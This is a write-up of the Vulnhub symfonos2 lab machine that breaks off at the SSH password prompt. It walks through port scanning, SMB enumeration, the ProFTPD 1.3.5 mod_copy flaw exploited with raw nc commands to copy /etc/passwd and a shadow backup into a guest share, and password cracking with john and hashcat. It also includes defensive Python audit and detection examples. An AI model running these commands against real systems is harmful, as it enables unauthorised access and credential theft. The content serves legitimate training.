Vulnhub-symfonos2 Penetration Walkthrough
Target Discovery
Since the target machine sits on the same network, arp-scan can be used to discover it:
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.0/24
[sudo] kali 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 00:50:56:c0:00:08 (Unknown)
192.168.56.2 00:50:56:fa:da:39 (Unknown)
192.168.56.137 00:0c:29:87:32:56 (Unknown)
192.168.56.254 00:50:56:e6:cb:ba (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.872 seconds (136.75 hosts/sec). 4 responded
From the scan results the target should be 192.168.56.137. Next comes asset enumeration: find the open ports and identify the services behind them.
Information Gathering
Open Ports
Port scan:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ sudo nmap -sS -p- 192.168.56.137 --min-rate=10000 -oA nmap_result/nmap_portscan
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-04 14:53 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00015s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:87:32:56 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.87 seconds
Service identification on the open ports:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ cat nmap_result/nmap_portscan/nmap_portscan.nmap | grep open | awk -F/ '{print $1}' | tr '\n' ','
21,22,80,139,445,
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ sudo nmap -sS -sV -p21,22,80,139,445,2 -A 192.168.56.137 --min-rate=10000 -oA nmap_result/nmap_portserver
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-04 14:56 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
2/tcp closed compressnet
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: webfs/1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:87:32:56 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2026-05-04T13:56:18-05:00
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2026-05-04T18:56:18
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.56.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
Summarising the scans above gives the following picture:
- OS: Linux 3.2 – 4.14 (Debian)
| Port | State | Service | Version / key information |
|---|---|---|---|
| 21 | open | FTP | ProFTPD 1.3.5; anonymous login worth trying |
| 22 | open | SSH | OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) |
| 80 | open | HTTP | WebFS httpd 1.21 (an uncommon web server); page has no title |
| 139 | open | NetBIOS-SSN | Samba smbd 3.X – 4.X; NetBIOS name: SYMFONOS2 |
| 445 | open | SMB | Samba 4.5.16-Debian; SMB2/3 message signing not required; guest account usable; WORKGROUP |
Overall, apart from the services on ports 22 and 139, which are set aside for now, everything else is worth trying.
SMB Service (445)
Enumerate the target's shares with smbclient:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ smbclient -L 192.168.56.137 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SYMFONOS2
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ smbclient //192.168.56.137/anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16313716 blocks available
smb: \> cd backups\
smb: \backups\> ls
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16313716 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (412.1 KiloBytes/sec) (average 412.1 KiloBytes/sec)
smb: \backups\> exit
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ cat log.txt
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
#======================= Global Settings =======================
[global]
## Browsing/Identification ###
# Change this to the workgroup/NT-domain name your Samba server will part of
workgroup = WORKGROUP
# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
# wins support = no
# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
; wins server = w.x.y.z
# This will prevent nmbd to search for NetBIOS names through DNS.
dns proxy = no
#### Networking ####
# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
; interfaces = 127.0.0.0/8 eth0
# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself. However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
; bind interfaces only = yes
#### Debugging/Accounting ####
# This tells Samba to use a separate log file for each machine
# that connects
log file = /var/log/samba/log.%m
# Cap the size of the individual log files (in KiB).
max log size = 1000
# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
# syslog only = no
# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
syslog = 0
# Do something sensible when Samba crashes: mail the admin a backtrace
panic action = /usr/share/samba/panic-action %d
####### Authentication #######
# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller".
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
server role = standalone server
# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.
passdb backend = tdbsam
obey pam restrictions = yes
# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
unix password sync = yes
# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
pam password change = yes
# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
map to guest = bad user
########## Domains ###########
#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set
#
# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
; logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
# logon path = \\%N\%U\profile
# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
; logon drive = H:
# logon home = \\%N\%U
# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
; logon script = logon.cmd
# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe. The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
# This allows machine accounts to be created on the domain controller via the
# SAMR RPC pipe.
# The following assumes a "machines" group exists on the system
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.
; add group script = /usr/sbin/addgroup --force-badname %g
############ Misc ############
# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
; include = /home/samba/etc/smb.conf.%m
# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
; idmap uid = 10000-20000
; idmap gid = 10000-20000
; template shell = /bin/bash
# Setup usershare options to enable non-root users to share folders
# with the net usershare command.
# Maximum number of usershare. 0 (default) means that usershare is disabled.
; usershare max shares = 100
# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
usershare allow guests = yes
#======================= Share Definitions =======================
[homes]
comment = Home Directories
browseable = no
# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
read only = yes
# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
create mask = 0700
# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
directory mask = 0700
# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
valid users = %S
# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
; comment = Network Logon Service
; path = /home/samba/netlogon
; guest ok = yes
; read only = yes
# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
; comment = Users profiles
; path = /home/samba/profiles
; guest ok = no
; browseable = no
; create mask = 0600
; directory mask = 0700
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Don't use IPv6 support by default.
UseIPv6 off
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask 022
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances 30
# Set the user and group under which the server will run.
User aeolus
Group aeolus
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
There is a share named anonymous; inside it is a backup file log.txt with a lot of content. After sorting through it, the following important information stands out:
- Username: aeolus (from the ProFTPD config, User aeolus / Group aeolus, and the SMB share path, path = /home/aeolus/share)
- A shadow backup exists (root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak)
This information cannot be exploited yet, however.
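As a defender's check on the configuration recovered above, here is an added example (not from the original post) that parses an smb.conf excerpt and flags the directives that make a share readable without credentials or expose a user's home directory. The excerpt is constructed from the directives shown on this page; the finding strings are my own.

```python
import configparser
from typing import List, Tuple

# Constructed excerpt that mirrors the directives of the smb.conf recovered from
# log.txt on this page; the full file is much longer and omitted here.
SAMPLE_SMB_CONF = """
[global]
workgroup = WORKGROUP
server role = standalone server
map to guest = bad user
usershare allow guests = yes

[homes]
comment = Home Directories
browseable = no
read only = yes
valid users = %S

[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no

[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
"""


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like: '#' and ';' start comments, values are never interpolated."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   comment_prefixes=("#", ";"))
    cp.read_string(text)
    return cp


def _yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text: str) -> List[Tuple[str, str]]:
    """Return (section, finding) pairs for settings that widen anonymous access."""
    cp = parse_smb_conf(text)
    findings: List[Tuple[str, str]] = []

    if cp.has_section("global"):
        g = cp["global"]
        guest_map = g.get("map to guest", "never").strip()
        if guest_map.lower() != "never":
            findings.append(("global", f"map to guest = {guest_map}: failed logins fall back to the guest account"))
        if _yes(g.get("usershare allow guests", "no")):
            findings.append(("global", "usershare allow guests = yes: users may publish guest-accessible shares"))

    for name in cp.sections():
        if name == "global":
            continue
        s = cp[name]
        # Samba defaults: guest ok = no, read only = yes, writable = no
        guest = _yes(s.get("guest ok", "no")) or _yes(s.get("public", "no"))
        writable = (_yes(s.get("writable", "no")) or _yes(s.get("writeable", "no"))
                    or not _yes(s.get("read only", "yes")))
        path = s.get("path", "").strip()
        if guest:
            findings.append((name, "guest ok = yes: share is readable without credentials"))
            if writable:
                findings.append((name, "share is guest-writable"))
        if path.startswith("/home/"):
            user = path.split("/")[2]
            findings.append((name, f"path {path} lies inside a user home directory and reveals the account '{user}'"))
    return findings
```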
Web服务(80)
First, browse to the target's web service.
Only a painting is shown as the background image, so try directory brute-forcing:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/80]
└─$ sudo dirsearch -u http://192.168.56.137 -x 403
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kali/Work/vulnhub/symfonos2/80/reports/http_192.168.56.137/_26-05-04_15-21-59.txt
Target: http://192.168.56.137/
[15:21:59] Starting:
Task Completed
Nothing useful was found.
FTP Service (21)
Try an anonymous login to the FTP service:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ ftp 192.168.56.137
Connected to 192.168.56.137.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.137]
Name (192.168.56.137:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
530 Login incorrect.
ftp: Login failed
ftp>
The login fails, so anonymous FTP access is not possible.
Service Vulnerabilities
At this point no services remain to explore, but the earlier nmap scan revealed version information for the FTP and web services, so check whether known vulnerability PoCs exist:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/80]
└─$ searchsploit WebFS 1.21
Exploits: No Results
Shellcodes: No Results
Papers: No Results
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/80]
└─$ searchsploit proftpd 1.3.5
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
searchsploit turns up a historical RCE vulnerability in the FTP service, CVE-2015-3306: the mod_copy module of ProFTPD 1.3.5 allows unauthenticated clients to use SITE CPFR (Copy From) and SITE CPTO (Copy To) to copy arbitrary files on the server.
Because the downloaded PoC had problems and would not run, nc can be used to copy the needed files by hand:
passwd file:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/nmap_result]
└─$ nc 192.168.56.137 21 << 'EOF'
SITE CPFR /etc/passwd
SITE CPTO /home/aeolus/share/passwd_test
QUIT
EOF
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.137]
350 File or directory exists, ready for destination name
250 Copy successful
221 Goodbye.
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ smbclient //192.168.56.137/anonymous -N -c 'get passwd_test'
getting file \passwd_test of size 1614 as passwd_test (788.0 KiloBytes/sec) (average 788.1 KiloBytes/sec)
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ cat passwd_test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:
shadow file:
PS: During information gathering we saw that shadow had been backed up (root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak), so the backup can be read out directly:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ nc 192.168.56.137 21 << 'EOF'
SITE CPFR /var/backups/shadow.bak
SITE CPTO /home/aeolus/share/shadow.bak
QUIT
EOF
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.137]
350 File or directory exists, ready for destination name
250 Copy successful
221 Goodbye.
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ smbclient //192.168.56.137/anonymous -N -c 'get shadow.bak'
getting file \shadow.bak of size 1173 as shadow.bak (572.7 KiloBytes/sec) (average 572.8 KiloBytes/sec)
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ cat shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
daemon:*:18095:0:99999:7:::
bin:*:18095:0:99999:7:::
sys:*:18095:0:99999:7:::
sync:*:18095:0:99999:7:::
games:*:18095:0:99999:7:::
man:*:18095:0:99999:7:::
lp:*:18095:0:99999:7:::
mail:*:18095:0:99999:7:::
news:*:18095:0:99999:7:::
uucp:*:18095:0:99999:7:::
proxy:*:18095:0:99999:7:::
www-data:*:18095:0:99999:7:::
backup:*:18095:0:99999:7:::
list:*:18095:0:99999:7:::
irc:*:18095:0:99999:7:::
gnats:*:18095:0:99999:7:::
nobody:*:18095:0:99999:7:::
systemd-timesync:*:18095:0:99999:7:::
systemd-network:*:18095:0:99999:7:::
systemd-resolve:*:18095:0:99999:7:::
systemd-bus-proxy:*:18095:0:99999:7:::
_apt:*:18095:0:99999:7:::
Debian-exim:!:18095:0:99999:7:::
messagebus:*:18095:0:99999:7:::
sshd:*:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
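From the defender's side, the CPFR/CPTO exchanges above leave a distinctive trace in the FTP command log. The following added example (not code from the original post) pairs SITE CPFR with the SITE CPTO that follows it per client and flags copies issued before any successful PASS, copies whose source is a sensitive system path, or copies landing in the guest-readable share path taken from this page's smb.conf. The log layout is an assumed ExtendedLog-style "time client user command reply-code" format and the sample lines are constructed; the practical fix is to upgrade ProFTPD (1.3.5a or later) or deny SITE_CPFR/SITE_CPTO in a Limit block, as the page's config already does for SITE_CHMOD.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in an assumed ExtendedLog-style layout:
# "<date> <time> <client> <user> "<command>" <reply code>". Not real ProFTPD output.
SAMPLE_FTP_LOG = """\
2026-05-04 15:30:01 192.168.56.128 - "SITE CPFR /etc/passwd" 350
2026-05-04 15:30:01 192.168.56.128 - "SITE CPTO /home/aeolus/share/passwd_test" 250
2026-05-04 15:30:02 192.168.56.128 - "QUIT" 221
2026-05-04 15:40:10 192.168.56.50 - "USER alice" 331
2026-05-04 15:40:11 192.168.56.50 alice "PASS (hidden)" 230
2026-05-04 15:40:20 192.168.56.50 alice "SITE CPFR /home/alice/notes.txt" 350
2026-05-04 15:40:20 192.168.56.50 alice "SITE CPTO /home/alice/notes.bak" 250
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<user>\S+) "(?P<cmd>[^"]*)" (?P<code>\d{3})$')

# Source prefixes that an FTP user should never be copying out of.
SENSITIVE_SOURCES = ("/etc/", "/var/backups/", "/root/")
# Destinations readable by anyone: the [anonymous] share path from this page's smb.conf.
GUEST_SHARE_PATHS = ("/home/aeolus/share",)


@dataclass
class CopyEvent:
    client: str
    user: str
    src: str
    dst: str
    authenticated: bool
    reasons: List[str]


def detect_mod_copy(lines) -> List[CopyEvent]:
    """Pair CPFR/CPTO per client (keyed by address; a real pipeline would key by session id)."""
    sessions: Dict[str, dict] = {}
    events: List[CopyEvent] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed layout
        client, cmd, code = m.group("client"), m.group("cmd"), int(m.group("code"))
        st = sessions.setdefault(client, {"auth": False, "cpfr": None})
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb == "PASS" and code == 230:
            st["auth"] = True  # 230 = login successful
        elif verb == "SITE":
            sub, _, path = arg.partition(" ")
            sub = sub.upper()
            if sub == "CPFR" and code == 350:
                st["cpfr"] = path  # 350 = source accepted, waiting for destination
            elif sub == "CPTO" and code == 250 and st["cpfr"]:
                reasons = []
                if not st["auth"]:
                    reasons.append("copy issued before authentication (CVE-2015-3306 pattern)")
                if st["cpfr"].startswith(SENSITIVE_SOURCES):
                    reasons.append(f"source {st['cpfr']} is a sensitive system file")
                if path.startswith(GUEST_SHARE_PATHS):
                    reasons.append(f"destination {path} is inside a guest-readable share")
                events.append(CopyEvent(client, m.group("user"), st["cpfr"], path,
                                        st["auth"], reasons))
                st["cpfr"] = None
        elif verb == "QUIT":
            sessions.pop(client, None)
    return events
```

Any event whose reasons list is non-empty is worth an alert; the benign alice copy shows the pairing alone is not enough to fire.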
Password Cracking
With the passwd and shadow files in hand, john or hashcat can be used to crack the passwords of the real users that have a bash shell:
# Merge passwd and shadow into the format john understands
unshadow passwd_test shadow.bak > crack_target.txt
# Run against the rockyou wordlist
john crack_target.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show the results
john crack_target.txt --show
john:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ john crack_target.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Remaining 2 password hashes with 2 different salts
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:16:03 16.97% (ETA: 18:56:26) 0g/s 2756p/s 5513c/s 5513C/s xxx26xxx..xxx 4 free
Session aborted
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ john crack_target.txt --show
aeolus:sergioteamo:1000:1000:,,,:/home/aeolus:/bin/bash
1 password hash cracked, 2 left
hashcat:
Temp\vulnhub\symfonos2
❯ hashcat -m 1800 -a 0 -O .\crack_tatget.txt D:\SafetyTools\DB\db\rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) Graphics, 8352/16797 MB (2047 MB allocatable), 64MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 15
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 562 MB
Dictionary cache built:
* Filename..: D:\SafetyTools\DB\db\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:sergioteamo
One usable credential was recovered: aeolus:sergioteamo
SSH login succeeds with it:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ ssh aeolus@192.168.56.137
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:bVM6iESUngv842ilwZ5pthpPxRaIrgL4RxNNbnBFssQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
aeolus@192.168.56.137's password:
